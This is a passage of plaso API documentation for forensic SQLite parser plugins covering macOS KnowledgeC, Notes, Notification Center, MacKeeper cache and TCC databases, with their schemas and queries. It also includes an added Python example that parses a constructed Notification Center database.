'ZHISTOGRAM': 'CREATE TABLE ZHISTOGRAM ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZSTREAMTYPECODE INTEGER, ZENDDATE TIMESTAMP, ZSTARTDATE TIMESTAMP, ZCUSTOMIDENTIFIER VARCHAR, ZDEVICEIDENTIFIER VARCHAR, ZIDENTIFIER VARCHAR, ZSTREAMNAME VARCHAR )', 'ZHISTOGRAMVALUE': 'CREATE TABLE ZHISTOGRAMVALUE ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZINTEGERVALUE INTEGER, ZHISTOGRAM INTEGER, ZCOUNT FLOAT, ZSTRINGVALUE VARCHAR )', 
'ZKEYVALUE': 'CREATE TABLE ZKEYVALUE ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZDOMAIN VARCHAR, ZKEY VARCHAR, ZVALUE BLOB )', 'ZOBJECT': 'CREATE TABLE ZOBJECT ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZUUIDHASH INTEGER, ZEVENT INTEGER, ZSOURCE INTEGER, ZCATEGORYTYPE INTEGER, ZINTEGERVALUE INTEGER, ZENDDAYOFWEEK INTEGER, ZENDSECONDOFDAY INTEGER, ZHASCUSTOMMETADATA INTEGER, ZHASSTRUCTUREDMETADATA INTEGER, ZSECONDSFROMGMT INTEGER, ZSHOULDSYNC INTEGER, ZSTARTDAYOFWEEK INTEGER, ZSTARTSECONDOFDAY INTEGER, ZVALUECLASS INTEGER, ZVALUEINTEGER INTEGER, ZVALUETYPECODE INTEGER, ZSTRUCTUREDMETADATA INTEGER, ZVALUE INTEGER, Z9_VALUE INTEGER, ZIDENTIFIERTYPE INTEGER, ZQUANTITYTYPE INTEGER, ZOBJECT INTEGER, Z9_OBJECT INTEGER, ZSUBJECT INTEGER, Z9_SUBJECT INTEGER, ZCREATIONDATE TIMESTAMP, ZLOCALCREATIONDATE TIMESTAMP, ZCONFIDENCE FLOAT, ZENDDATE TIMESTAMP, ZSTARTDATE TIMESTAMP, ZVALUEDOUBLE FLOAT, ZDOUBLEVALUE FLOAT, ZUUID VARCHAR, ZSTREAMNAME VARCHAR, ZVALUESTRING VARCHAR, ZSTRING VARCHAR, ZVERBPHRASE VARCHAR, ZMETADATA BLOB )', 'ZSOURCE': 'CREATE TABLE ZSOURCE ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZUSERID INTEGER, ZBUNDLEID VARCHAR, ZDEVICEID VARCHAR, ZGROUPID VARCHAR, ZITEMID VARCHAR, ZSOURCEID VARCHAR )', 'ZSTRUCTUREDMETADATA': 'CREATE TABLE ZSTRUCTUREDMETADATA ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, Z_CDPORTRAITMETADATAKEY__ALGORITHM INTEGER, Z_CDPORTRAITMETADATAKEY__ASSETVERSION INTEGER, Z_DKAPPINSTALLMETADATAKEY__ISINSTALL INTEGER, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ISELIGIBLEFORPREDICTION INTEGER, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ISPUBLICLYINDEXABLE INTEGER, Z_DKAPPLICATIONMETADATAKEY__PROCESSIDENTIFIER INTEGER, Z_DKAUDIOMETADATAKEY__ROUTECHANGEREASON INTEGER, Z_DKBLUETOOTHMETADATAKEY__DEVICETYPE INTEGER, Z_DKBULLETINBOARDMETADATAKEY__HASDATE INTEGER, Z_DKDIGITALHEALTHMETADATAKEY__USAGETYPE INTEGER, Z_DKGLANCELAUNCHMETADATA__DEVICEIDENTIFIER INTEGER, Z_DKINTENTMETADATAKEY__DONATEDBYSIRI INTEGER, 
Z_DKINTENTMETADATAKEY__INTENTHANDLINGSTATUS INTEGER, Z_DKINTENTMETADATAKEY__INTENTTYPE INTEGER, Z_DKNOWPLAYINGMETADATAKEY__IDENTIFIER INTEGER, Z_DKNOWPLAYINGMETADATAKEY__PLAYING INTEGER, Z_DKSEARCHFEEDBACKMETADATAKEY__INTERACTIONTYPE INTEGER, Z_DKSEARCHFEEDBACKMETADATAKEY__SUGGESTIONTYPE INTEGER, Z_QPMETRICSMETADATAKEY__QUERYENGAGED INTEGER, Z_QPMETRICSMETADATAKEY__RESULTENGAGED INTEGER, ZCOM_APPLE_CALENDARUIKIT_USERACTIVITY_DATE INTEGER, ZCOM_APPLE_CALENDARUIKIT_USERACTIVITY_ENDDATE INTEGER, Z_CDPORTRAITMETADATAKEY__DECAYRATE FLOAT, Z_CDPORTRAITMETADATAKEY__SCORE FLOAT, Z_DKAPPLICATIONACTIVITYMETADATAKEY__EXPIRATIONDATE TIMESTAMP, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__LATITUDE FLOAT, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__LONGITUDE FLOAT, Z_DKLOCATIONMETADATAKEY__LATITUDE FLOAT, Z_DKLOCATIONMETADATAKEY__LONGITUDE FLOAT, Z_DKNOWPLAYINGMETADATAKEY__DURATION FLOAT, Z_DKNOWPLAYINGMETADATAKEY__ELAPSED FLOAT, Z_DKPERIODMETADATAKEY__PERIODEND TIMESTAMP, Z_DKPERIODMETADATAKEY__PERIODSTART TIMESTAMP, Z_QPMETRICSMETADATAKEY__TIMESTAMP FLOAT, Z_CDENTITYMETADATAKEY__BESTLANGUAGE VARCHAR, Z_CDENTITYMETADATAKEY__NAME VARCHAR, Z_CDPORTRAITMETADATAKEY__OSBUILD VARCHAR, Z_DKAPPINSTALLMETADATAKEY__PRIMARYCATEGORY VARCHAR, Z_DKAPPINSTALLMETADATAKEY__TITLE VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ACTIVITYTYPE VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__CONTENTDESCRIPTION VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ITEMIDENTIFIER VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ITEMRELATEDUNIQUEIDENTIFIER VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__SUGGESTEDINVOCATIONPHRASE VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__TITLE VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__USERACTIVITYREQUIREDSTRING VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__USERACTIVITYUUID VARCHAR, Z_DKAPPLICATIONMETADATAKEY__BACKBOARDSTATE VARCHAR, Z_DKAPPLICATIONMETADATAKEY__EXTENSIONCONTAININGBUNDLEIDENTIFIER VARCHAR, Z_DKAPPLICATIONMETADATAKEY__EXTENSIONHOSTIDENTIFIER VARCHAR, 
Z_DKAPPLICATIONMETADATAKEY__LAUNCHREASON VARCHAR, Z_DKAUDIOMETADATAKEY__CHANNELS VARCHAR, Z_DKAUDIOMETADATAKEY__DATASOURCES VARCHAR, Z_DKAUDIOMETADATAKEY__IDENTIFIER VARCHAR, Z_DKAUDIOMETADATAKEY__PORTNAME VARCHAR, Z_DKAUDIOMETADATAKEY__PORTTYPE VARCHAR, Z_DKAUDIOMETADATAKEY__PREFERREDDATASOURCE VARCHAR, Z_DKAUDIOMETADATAKEY__SELECTEDDATASOURCE VARCHAR, Z_DKBATTERYSAVERMETADATAKEY__SOURCE VARCHAR, Z_DKBLUETOOTHMETADATAKEY__ADDRESS VARCHAR, Z_DKBLUETOOTHMETADATAKEY__NAME VARCHAR, Z_DKBULLETINBOARDMETADATAKEY__FEED VARCHAR, Z_DKBULLETINBOARDMETADATAKEY__MESSAGE VARCHAR, Z_DKBULLETINBOARDMETADATAKEY__SUBTITLE VARCHAR, Z_DKBULLETINBOARDMETADATAKEY__TITLE VARCHAR, Z_DKCALENDARMETADATAKEY__INTERACTION VARCHAR, Z_DKCALLMETADATAKEY__INTERACTION VARCHAR, Z_DKDEVICEIDMETADATAKEY__DEVICEIDENTIFIER VARCHAR, Z_DKDIGITALHEALTHMETADATAKEY__WEBDOMAIN VARCHAR, Z_DKINTENTMETADATAKEY__INTENTCLASS VARCHAR, Z_DKINTENTMETADATAKEY__INTENTVERB VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__URL VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__CITY VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__COUNTRY VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__DISPLAYNAME VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__FULLYFORMATTEDADDRESS VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__LOCATIONNAME VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__POSTALCODE_V2 VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__STATEORPROVINCE VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__SUBTHOROUGHFARE VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__THOROUGHFARE VARCHAR, Z_DKLOCATIONMETADATAKEY__IDENTIFIER VARCHAR, Z_DKMETADATAHOMEAPPVIEW__HOMEUUID VARCHAR, Z_DKMETADATAHOMEAPPVIEW__VIEWINFORMATION VARCHAR, Z_DKMETADATAHOMEAPPVIEW__VIEWNAME VARCHAR, Z_DKMETADATAHOMEAPPVIEW__VIEWUUID VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__ACCESSORYNAME VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__ACCESSORYUUID VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__CHARACTERISTICTYPE 
VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__CLIENTNAME VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__HOMEUUID VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__SERVICENAME VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__SERVICETYPE VARCHAR, Z_DKMETADATAHOMEKITSCENE__ACTIONSETNAME VARCHAR, Z_DKMETADATAHOMEKITSCENE__ACTIONSETTYPE VARCHAR, Z_DKMETADATAHOMEKITSCENE__ACTIONSETUUID VARCHAR, Z_DKMETADATAHOMEKITSCENE__CLIENTNAME VARCHAR, Z_DKMETADATAHOMEKITSCENE__HOMEUUID VARCHAR, Z_DKMETADATAHOMEKITSCENE__SCENENAME VARCHAR, Z_DKMICROLOCATIONMETADATAKEY__LOCATIONDISTRIBUTION VARCHAR, Z_DKMICROLOCATIONMETADATAKEY__MICROLOCATIONDISTRIBUTION VARCHAR, Z_DKNOTIFICATIONUSAGEMETADATAKEY__BUNDLEID VARCHAR, Z_DKNOTIFICATIONUSAGEMETADATAKEY__IDENTIFIER VARCHAR, Z_DKNOWPLAYINGMETADATAKEY__ALBUM VARCHAR, Z_DKNOWPLAYINGMETADATAKEY__ARTIST VARCHAR, Z_DKNOWPLAYINGMETADATAKEY__GENRE VARCHAR, Z_DKNOWPLAYINGMETADATAKEY__TITLE VARCHAR, Z_DKRELEVANTSHORTCUTMETADATAKEY__KEYIMAGEPROXYIDENTIFIER VARCHAR, Z_DKSAFARIHISTORYMETADATAKEY__TITLE VARCHAR, Z_DKSEARCHFEEDBACKMETADATAKEY__CLIENT VARCHAR, Z_DKSEARCHFEEDBACKMETADATAKEY__CONTACTID VARCHAR, Z_DKTOMBSTONEMETADATAKEY__EVENTSOURCEDEVICEID VARCHAR, Z_DKTOMBSTONEMETADATAKEY__EVENTSTREAMNAME VARCHAR, Z_QPMETRICSMETADATAKEY__QUERY VARCHAR, ZCOM_APPLE_CALENDARUIKIT_USERACTIVITY_EXTERNALID VARCHAR, ZKCDCSNOTIFICATIONOPTIONCLIENTIDENTIFIERKEY VARCHAR, ZKCDCSNOTIFICATIONOPTIONCLIENTLAUNCHKEY VARCHAR, ZKCDCSNOTIFICATIONOPTIONPERSISTENTPREDICATESTRINGKEY VARCHAR, ZMETADATAHASH VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ITEMRELATEDCONTENTURL VARCHAR, Z_DKDIGITALHEALTHMETADATAKEY__WEBPAGEURL VARCHAR, Z_DKAPPINSTALLMETADATAKEY__SUBCATEGORIES BLOB, Z_DKINTENTMETADATAKEY__SERIALIZEDINTERACTION BLOB, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__PHONENUMBERS BLOB, Z_DKRELEVANTSHORTCUTMETADATAKEY__SERIALIZEDRELEVANTSHORTCUT BLOB, Z_QPMETRICSMETADATAKEY__CANDIDATELIST BLOB, Z_QPMETRICSMETADATAKEY__QUERYLIST BLOB )', 'ZSYNCPEER': 'CREATE TABLE ZSYNCPEER ( Z_PK INTEGER 
PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZCLOUDID VARCHAR, ZDEVICEID VARCHAR, ZRAPPORTID VARCHAR, ZUUID BLOB )', 'Z_4EVENT': 'CREATE TABLE Z_4EVENT ( Z_4CUSTOMMETADATA INTEGER, Z_11EVENT INTEGER, PRIMARY KEY (Z_4CUSTOMMETADATA, Z_11EVENT) )', 'Z_METADATA': 'CREATE TABLE Z_METADATA (Z_VERSION INTEGER PRIMARY KEY, Z_UUID VARCHAR(255), Z_PLIST BLOB)', 'Z_MODELCACHE': 'CREATE TABLE Z_MODELCACHE (Z_CONTENT BLOB)', 'Z_PRIMARYKEY': 'CREATE TABLE Z_PRIMARYKEY (Z_ENT INTEGER PRIMARY KEY, Z_NAME VARCHAR, Z_SUPER INTEGER, Z_MAX INTEGER)'}]
class plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCSafariEventData
Bases: plaso.containers.events.EventData
MacOS Duet / KnowledgeC database event data for Safari.
bundle_identifier (str): bundle identifier of the application.
duration (int): duration of the activity.
title (str): title of the webpage visited.
url (str): URL visited.
DATA_TYPE = 'mac:knowledgec:safari'
plaso.parsers.sqlite_plugins.mac_notes module
SQLite parser plugin for MacOS Notes database files.
class plaso.parsers.sqlite_plugins.mac_notes.MacNotesEventData
Bases: plaso.containers.events.EventData
Mac Notes event data.
text (str): note text.
title (str): note title.
DATA_TYPE = 'mac:notes:note'
class plaso.parsers.sqlite_plugins.mac_notes.MacNotesPlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for MacOS notes database files.
The MacOS Notes database file is typically named NotesV7.storedata (the path test_data/NotesV7.storedata given in the plugin docstring is the plaso test fixture, not the location on a live system).
DATA_FORMAT = 'MacOS Notes SQLite database (NotesV7.storedata) file'
NAME = 'mac_notes'
ParseZHTMLSTRINGRow(parser_mediator, query, row, **unused_kwargs)
Parses a row from the database.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row resulting from query.
QUERIES = [('SELECT ZNOTEBODY.ZHTMLSTRING AS zhtmlstring, ZNOTE.ZDATECREATED AS timestamp, ZNOTE.ZDATEEDITED AS last_modified_time, ZNOTE.ZTITLE as title FROM ZNOTEBODY, ZNOTE WHERE ZNOTEBODY.Z_PK = ZNOTE.Z_PK', 'ParseZHTMLSTRINGRow')]
REQUIRED_STRUCTURE = {'ZNOTE': frozenset({'ZDATECREATED', 'ZDATEEDITED', 'ZTITLE'}), 'ZNOTEBODY': frozenset({'ZHTMLSTRING'})}
SCHEMAS = [{'ZACCOUNT': 'CREATE TABLE ZACCOUNT ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER,Z_OPT INTEGER, ZALLOWINSECUREAUTHENTICATION INTEGER,ZDIDCHOOSETOMIGRATE INTEGER, ZENABLED INTEGER, ZROOTFOLDERINTEGER, Z6_ROOTFOLDER INTEGER, ZTRASHFOLDER INTEGER,ZGMAILCAPABILITIESSUPPORT INTEGER, ZPORT INTEGER,ZSECURITYLAYERTYPE INTEGER, ZMIGRATIONOFFERED INTEGER,ZACCOUNTDESCRIPTION VARCHAR, ZEMAILADDRESS VARCHAR, ZFULLNAMEVARCHAR, ZPARENTACACCOUNTIDENTIFIER VARCHAR, ZUSERNAME VARCHAR,ZFOLDERHIERARCHYSYNCSTATE VARCHAR, ZAUTHENTICATION VARCHAR,ZHOSTNAME VARCHAR, ZSERVERPATHPREFIX VARCHAR, ZEXTERNALURL BLOB,ZINTERNALURL BLOB, ZLASTUSEDAUTODISCOVERURL BLOB,ZTLSCERTIFICATE BLOB )', 'ZATTACHMENT': 'CREATE TABLE ZATTACHMENT ( Z_PK INTEGER PRIMARY KEY, Z_ENTINTEGER, Z_OPT INTEGER, ZNOTE INTEGER, Z10_NOTE INTEGER,ZCONTENTID VARCHAR, ZFILEURL BLOB )', 'ZFOLDER': 'CREATE TABLE ZFOLDER ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER,Z_OPT INTEGER, ZACCOUNT INTEGER, Z1_ACCOUNT INTEGER, ZPARENTINTEGER, Z6_PARENT INTEGER, ZISDISTINGUISHED INTEGER,ZALLEGEDHIGHESTMODIFICATIONSEQUENCE INTEGER,ZCOMPUTEDHIGHESTMODIFICATIONSEQUENCE INTEGER, ZUIDNEXT INTEGER,ZUIDVALIDITY INTEGER, ZTRASHACCOUNT INTEGER, Z1_TRASHACCOUNTINTEGER, ZNAME VARCHAR, ZCHANGEKEY VARCHAR, ZFOLDERID VARCHAR,ZSYNCSTATE VARCHAR, ZSERVERNAME VARCHAR )', 'ZNOTE': 'CREATE TABLE ZNOTE ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER,Z_OPT INTEGER, ZBODY INTEGER, ZFOLDER INTEGER, Z6_FOLDERINTEGER, ZMIMEDATASIZE INTEGER, ZDATECREATED TIMESTAMP,ZDATEEDITED TIMESTAMP, ZREMOTEID VARCHAR, ZTITLE VARCHAR,ZCHANGEKEY VARCHAR, ZUNIVERSALLYUNIQUEID BLOB )', 'ZNOTEBODY': 'CREATE TABLE ZNOTEBODY ( Z_PK INTEGER PRIMARY KEY, Z_ENTINTEGER, Z_OPT INTEGER, ZNOTE INTEGER, Z10_NOTE INTEGER,ZHTMLSTRING VARCHAR )', 'ZOFFLINEACTION': 'CREATE TABLE ZOFFLINEACTION ( Z_PK INTEGER PRIMARY KEY, Z_ENTINTEGER, Z_OPT INTEGER, ZSEQUENCENUMBER INTEGER, ZACCOUNTINTEGER, Z1_ACCOUNT INTEGER, ZFOLDER INTEGER, Z6_FOLDER INTEGER,ZPARENT INTEGER, Z6_PARENT INTEGER, ZORIGINALPARENT 
INTEGER,Z6_ORIGINALPARENT INTEGER, ZFOLDER1 INTEGER, Z6_FOLDER1 INTEGER,ZNOTE INTEGER, Z10_NOTE INTEGER, ZORIGINALFOLDER INTEGER,Z6_ORIGINALFOLDER INTEGER )', 'Z_METADATA': 'CREATE TABLE Z_METADATA (Z_VERSION INTEGER PRIMARY KEY, Z_UUIDVARCHAR(255), Z_PLIST BLOB)', 'Z_MODELCACHE': 'CREATE TABLE Z_MODELCACHE (Z_CONTENT BLOB)', 'Z_PRIMARYKEY': 'CREATE TABLE Z_PRIMARYKEY (Z_ENT INTEGER PRIMARY KEY, Z_NAMEVARCHAR, Z_SUPER INTEGER, Z_MAX INTEGER)'}]
plaso.parsers.sqlite_plugins.mac_notificationcenter module
SQLite parser plugin for MacOS Notification Center database files.
class plaso.parsers.sqlite_plugins.mac_notificationcenter.MacNotificationCenterEventData
Bases: plaso.containers.events.EventData
MacOS NotificationCenter event data.
body (str): body of the notification message.
bundle_name (str): name of the application's bundle that generated the notification.
presented (int): 1 if the notification has been shown to the user, otherwise 0.
subtitle (str): optional subtitle of the notification message.
title (str): title of the message. Usually the name of the application that generated the notification; occasionally the name of the sender of the notification, for example in the case of chat messages.
DATA_TYPE = 'mac:notificationcenter:db'
class plaso.parsers.sqlite_plugins.mac_notificationcenter.MacNotificationCenterPlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for MacOS Notification Center database files.
The MacOS Notification Center database file is typically stored in: /private/var/folders/<W><d>/../0/com.apple.notificationcenter/db2/db
At the moment the plugin only takes into consideration the main table, 'record'. Tables present in the database and their content:
• record: historical records
• requests: pending requests
• delivered: delivered requests
• displayed: displayed requests, by app_id
• snoozed: requests snoozed by the user
DATA_FORMAT = 'MacOS Notification Center SQLite database file'
NAME = 'mac_notificationcenter'
ParseNotificationcenterRow(parser_mediator, query, row, **unused_kwargs)
Parses a message row.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
QUERIES = [('SELECT a.identifier AS bundle_name, r.data AS dataBlob, r.delivered_date AS timestamp,r.presented AS presented FROM app a, record r WHERE a.app_id = r.app_id', 'ParseNotificationcenterRow')]
REQUIRED_STRUCTURE = {'app': frozenset({'app_id', 'identifier'}), 'record': frozenset({'app_id', 'data', 'delivered_date', 'presented'})}
SCHEMAS = [{'app': 'CREATE TABLE app (app_id INTEGER PRIMARY KEY, identifier VARCHAR)', 'dbinfo': 'CREATE TABLE dbinfo (key VARCHAR, value VARCHAR)', 'delivered': 'CREATE TABLE delivered (app_id INTEGER PRIMARY KEY, list BLOB)', 'displayed': 'CREATE TABLE displayed (app_id INTEGER PRIMARY KEY, list BLOB)', 'record': 'CREATE TABLE record (rec_id INTEGER PRIMARY KEY, app_id INTEGER, uuid BLOB, data BLOB, request_date REAL, request_last_date REAL, delivered_date REAL, presented Bool, style INTEGER, snooze_fire_date REAL)', 'requests': 'CREATE TABLE requests (app_id INTEGER PRIMARY KEY, list BLOB)', 'snoozed': 'CREATE TABLE snoozed (app_id INTEGER PRIMARY KEY, list BLOB)'}]
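The following is an added example (not plaso's own code) showing what the plugin above has to do with each row: run the documented QUERIES entry against the app and record tables, decode the record.data blob and populate the MacNotificationCenterEventData fields. It builds an in-memory database with constructed rows. The blob layout it assumes (a binary plist whose 'req' dictionary carries 'titl', 'subt' and 'body') and the treatment of delivered_date as a Cocoa timestamp (seconds since 2001-01-01 UTC) are this example's assumptions; one deliberately corrupt blob shows why a per-row decode failure should be counted and skipped rather than abort the whole table.

```python
"""Added example, not plaso code: run the mac_notificationcenter plugin's query
against a constructed db2/db and decode the record data blob."""
import plistlib
import sqlite3
from datetime import datetime, timedelta, timezone

# delivered_date is treated as a Cocoa timestamp: seconds since 2001-01-01 UTC.
COCOA_EPOCH = datetime(2001, 1, 1, tzinfo=timezone.utc)

# "app" and "record" tables as listed in SCHEMAS above.
APP_SCHEMA = 'CREATE TABLE app (app_id INTEGER PRIMARY KEY, identifier VARCHAR)'
RECORD_SCHEMA = (
    'CREATE TABLE record (rec_id INTEGER PRIMARY KEY, app_id INTEGER, '
    'uuid BLOB, data BLOB, request_date REAL, request_last_date REAL, '
    'delivered_date REAL, presented Bool, style INTEGER, snooze_fire_date REAL)')

# The plugin's query, verbatim from QUERIES above.
PLUGIN_QUERY = (
    'SELECT a.identifier AS bundle_name, r.data AS dataBlob, '
    'r.delivered_date AS timestamp, r.presented AS presented '
    'FROM app a, record r WHERE a.app_id = r.app_id')


def make_record_blob(title, subtitle, body):
    """Builds a record.data blob as a binary plist. The key layout used here
    (a 'req' dictionary holding 'titl', 'subt' and 'body') is an assumption
    of this example."""
    req = {'titl': title, 'body': body}
    if subtitle is not None:
        req['subt'] = subtitle
    return plistlib.dumps({'req': req}, fmt=plistlib.FMT_BINARY)


def build_sample_db():
    """In-memory db2/db with constructed rows, including one record whose
    data blob is not a plist at all."""
    conn = sqlite3.connect(':memory:')
    conn.row_factory = sqlite3.Row
    conn.execute(APP_SCHEMA)
    conn.execute(RECORD_SCHEMA)
    conn.executemany('INSERT INTO app VALUES (?, ?)', [
        (1, 'com.apple.Terminal'), (2, 'com.example.chat')])
    records = [
        (1, 1, make_record_blob('Terminal', None, 'Process completed'),
         600000000.0, 1),
        (2, 2, make_record_blob('Alice', 'Direct message',
                                'Can you send me the VPN config?'),
         600000100.0, 0),
        (3, 2, b'\x00\x01not-a-plist', 600000200.0, 1),  # corrupt blob
    ]
    conn.executemany(
        'INSERT INTO record (rec_id, app_id, data, delivered_date, presented) '
        'VALUES (?, ?, ?, ?, ?)', records)
    conn.commit()
    return conn


def parse_notifications(conn):
    """Runs the plugin query and decodes each blob into the
    MacNotificationCenterEventData fields. Returns (events, skipped): a blob
    that does not decode is counted and skipped, so one corrupt row does not
    abort the table."""
    events, skipped = [], 0
    for row in conn.execute(PLUGIN_QUERY):
        try:
            plist = plistlib.loads(row['dataBlob'])
        except (plistlib.InvalidFileException, ValueError):
            skipped += 1
            continue
        req = plist.get('req', {})
        events.append({
            'data_type': 'mac:notificationcenter:db',
            'timestamp': COCOA_EPOCH + timedelta(seconds=row['timestamp']),
            'bundle_name': row['bundle_name'],
            'presented': int(row['presented']),
            'title': req.get('titl'),
            'subtitle': req.get('subt'),
            'body': req.get('body'),
        })
    return events, skipped
```

Calling parse_notifications(build_sample_db()) yields two events and a skipped count of one. The query has no ORDER BY, so callers that need chronological output should sort on the timestamp themselves rather than rely on join order.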
plaso.parsers.sqlite_plugins.mackeeper_cache module
SQLite parser plugin for MacOS MacKeeper cache database files.
class plaso.parsers.sqlite_plugins.mackeeper_cache.MacKeeperCacheEventData
Bases: plaso.containers.events.EventData
MacKeeper Cache event data.
description (str): description.
event_type (str): event type.
record_id (int): record identifier.
room (str): room.
text (str): text.
url (str): URL.
user_name (str): user name.
user_sid (str): user security identifier (SID).
DATA_TYPE = 'mackeeper:cache'
class plaso.parsers.sqlite_plugins.mackeeper_cache.MacKeeperCachePlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for MacOS MacKeeper cache database files.
DATA_FORMAT = 'MacOS MacKeeper cache SQLite database file'
NAME = 'mackeeper_cache'
ParseReceiverData(parser_mediator, query, row, **unused_kwargs)
Parses a single row from the receiver and cache response table.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
QUERIES = [('SELECT d.entry_ID AS id, d.receiver_data AS data, r.request_key, r.time_stamp AS time_string FROM cfurl_cache_receiver_data d, cfurl_cache_response r WHERE r.entry_ID = d.entry_ID', 'ParseReceiverData')]
REQUIRED_STRUCTURE = {'cfurl_cache_blob_data': frozenset({}), 'cfurl_cache_receiver_data': frozenset({'entry_ID', 'receiver_data'}), 'cfurl_cache_response': frozenset({'entry_ID', 'request_key', 'time_stamp'})}
SCHEMAS = [{'cfurl_cache_blob_data': 'CREATE TABLE cfurl_cache_blob_data(entry_ID INTEGER PRIMARY KEY, response_object BLOB, request_object BLOB, proto_props BLOB, user_info BLOB)', 'cfurl_cache_receiver_data': 'CREATE TABLE cfurl_cache_receiver_data(entry_ID INTEGER PRIMARY KEY, receiver_data BLOB)', 'cfurl_cache_response': 'CREATE TABLE cfurl_cache_response(entry_ID INTEGER PRIMARY KEY AUTOINCREMENT UNIQUE, version INTEGER, hash_value INTEGER, storage_policy INTEGER, request_key TEXT UNIQUE, time_stamp NOT NULL DEFAULT CURRENT_TIMESTAMP, partition TEXT)', 'cfurl_cache_schema_version': 'CREATE TABLE cfurl_cache_schema_version(schema_version INTEGER)'}]
plaso.parsers.sqlite_plugins.macos_tcc module
SQLite parser plugin for MacOS TCC database files.
class plaso.parsers.sqlite_plugins.macos_tcc.MacOSTCCEntry
Bases: plaso.containers.events.EventData
macOS TCC event data.
allowed (bool): whether access to the service was allowed.
client (str): name of the client requesting access to the service.
prompt_count (int): number of times an application prompted the user for access to a service.
service (str): name of the service.
DATA_TYPE = 'macos:tcc_entry'
class plaso.parsers.sqlite_plugins.macos_tcc.MacOSTCCPlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for MacOS TCC database files.
The MacOS Transparency, Consent, and Control (TCC) database file is typically stored in: /Library/Application Support/com.apple.TCC/TCC.db (system-wide) and /Users/<username>/Library/Application Support/com.apple.TCC/TCC.db (per user). On recent macOS versions the system-wide file is protected by System Integrity Protection and the per-user file requires Full Disk Access to read, so the database is normally acquired from a disk image or by a process holding that permission.
DATA_FORMAT = 'MacOS Transaprency, Consent, Control (TCC) SQLite database (TCC.db) file'
NAME = 'macostcc'
ParseTCCEntry(parser_mediator, query, row, **unused_kwargs)
Parses an application usage row.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
QUERIES = [("SELECT service, client, allowed, prompt_count, last_modified, DATETIME(last_modified, 'UNIXEPOCH', 'LOCALTIME') AS timestamp FROM access;", 'ParseTCCEntry')]
REQUIRED_STRUCTURE = {'access': frozenset({'access', 'access_overrides', 'active_policy', 'admin', 'expired', 'policies'})}
